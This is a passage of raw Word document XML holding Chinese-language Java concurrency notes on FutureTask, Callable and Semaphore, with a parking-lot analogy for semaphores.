      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> FutureTask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> get </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法所返回的结果类型。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">public V get() throws InterruptedException,ExecutionException </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如有必要，等待计算完成，然后获取其结果。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建并启动有返回值的线程步骤与实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Runnable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口相似：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口的实现类，并实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实现类的实例，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FutureTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类来包装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FutrueTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建并启动新线程。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FutrueTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法来获得子线程执行结束后的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00021895" w:rsidRPr="00021895" w:rsidRDefault="00021895" w:rsidP="00B83533"/>
    <w:p w:rsidR="00843150" w:rsidRPr="00F41A4C" w:rsidRDefault="00843150" w:rsidP="00843150">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Semaphore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信号量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83533" w:rsidRDefault="00342584" w:rsidP="00B83533">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007F2E6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它用来控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时访问特定资源的线程数量，它通过协调各个线程，以保证合理的使用公共资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2E6D" w:rsidRDefault="007F2E6D" w:rsidP="007F2E6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="244" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>emaphore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>分为单值和多值两种，前者只能被一个线程获得，后者可以被若干个线程获得。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2E6D" w:rsidRDefault="007F2E6D" w:rsidP="007F2E6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="244" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>以一个停车场运作为例。为了简单起见，假设停车场只有三个车位，一开始三个车位都是空的。这时如果同时来了五辆车，看门人允许其中三辆不受阻碍的进入，然后放下车拦，剩下的车则必须在入口等待，此后来的车也都不得不在入口处等待。这时，有一辆车离开停车场，看门人得知后，打开车拦，放入一辆，如果又离开两辆，则又可以放入两辆，如此往复。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2E6D" w:rsidRDefault="007F2E6D" w:rsidP="007F2E6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="244" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在这个停车场系统中，车位是公共资源，每辆车好比一个线程，看门人起的就是信号量的作用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2E6D" w:rsidRDefault="007F2E6D" w:rsidP="007F2E6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="244" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>更进一步，信号量的特性如下：信号量是一个非负整数（车位数），所有通过它的线程（车辆）都会将该整数减一（通过它当然是为了使用资源），当该整数值为零时，所有试图通过它的线程都将处于等待状态。在信号量上我们定义两种操作：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>（等待）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>（释放）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>当一个线程调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>（等待）操作时，它要么通过然后将信号量减一，要么一直等下去，直到信号量大于一或超时。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>（释放）实际上是在信号量上执行加操作，对应于车辆离开停车场，该操作之所以叫做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>释放</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>是因为加操作实际上是释放了由信号量守护的资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2E6D" w:rsidRDefault="007F2E6D" w:rsidP="007F2E6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="244" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>中，还可以设置该信号量是否采用公平模式，如果以公平方式执行，则线程将会按到达的顺序（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>FIFO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>）执行，如果是非公平，则可以后请求的有可能排在队列的头部。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>中定义如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Semaphore(int permits, boolean fair)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">　　创建具有给定的许可数和给定的公平设置的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Semaphore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2E6D" w:rsidRDefault="007F2E6D" w:rsidP="007F2E6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="244" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
